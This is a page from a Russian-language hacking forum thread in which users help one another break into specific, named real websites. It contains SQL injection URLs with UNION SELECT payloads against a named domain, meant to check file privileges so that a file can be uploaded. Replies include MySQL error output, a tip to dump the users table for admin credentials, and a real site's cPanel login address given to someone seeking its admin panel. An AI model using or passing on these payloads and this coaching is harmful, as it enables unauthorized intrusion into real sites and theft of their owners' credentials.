HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1320 из 2422 « Первая < 320820122012701310 1316 1317 1318 1319 1320 1321 1322 1323 1324 13301370142018202320 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.05.2010, 22:34
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от GOGA075  
.:[melkiy]:. Ну хоть до кого то дошло!!

Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!
В Друпал
./sites/default/settings.php
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 29.05.2010, 20:37
DrakonSerg
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами: 8984365

Репутация: 45
По умолчанию
2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?
 
Ответить с цитированием

  #3  
Старый 29.05.2010, 20:47
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от DrakonSerg  
2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?

даю гарантию что твой сайт уже несколько раз поимели,в кэше googla хранится, а по поводу админки даже не смотрел
 
Ответить с цитированием

  #4  
Старый 30.05.2010, 12:51
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?
 
Ответить с цитированием

  #5  
Старый 30.05.2010, 13:05
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию
Цитата:
Сообщение от CyberHunter  
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?
попробуй таблицу users
там админ
 
Ответить с цитированием

  #6  
Старый 30.05.2010, 13:06
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
Цитата:
biophys.am
если мойно помоqите наыти админку
 
Ответить с цитированием

  #7  
Старый 30.05.2010, 13:12
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию
Цитата:
Сообщение от LokbatanLi  
если мойно помоqите наыти админку
http://biophys.am:2082/
 
Ответить с цитированием

  #8  
Старый 30.05.2010, 13:13
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
eto cPanel
 
Ответить с цитированием

  #9  
Старый 30.05.2010, 13:59
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию
Цитата:
Сообщение от CyberHunter  
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?
Для кого человек это писал? https://forum.antichat.ru/thread104591.html

Цитата:
Сообщение от CyberHunter  
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
плохо читал видать
если ошибки
Код:
MySQL server version for the right syntax to use near '\'db156426_4\' --'
Код:
Access denied for user 'db156426_4'@'127.0.0.2' to database 'mysql'
тебе ни о чем не говорят,то я не знаю...
Последний раз редактировалось .:[melkiy]:.; 30.05.2010 в 14:24..
 
Ответить с цитированием

  #10  
Старый 30.05.2010, 14:14
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию
Цитата:
Для кого человек это писал? https://forum.antichat.ru/thread104591.html
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
 
Ответить с цитированием
Ответ
Страница 1320 из 2422 « Первая < 320820122012701310 1316 1317 1318 1319 1320 1321 1322 1323 1324 13301370142018202320 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.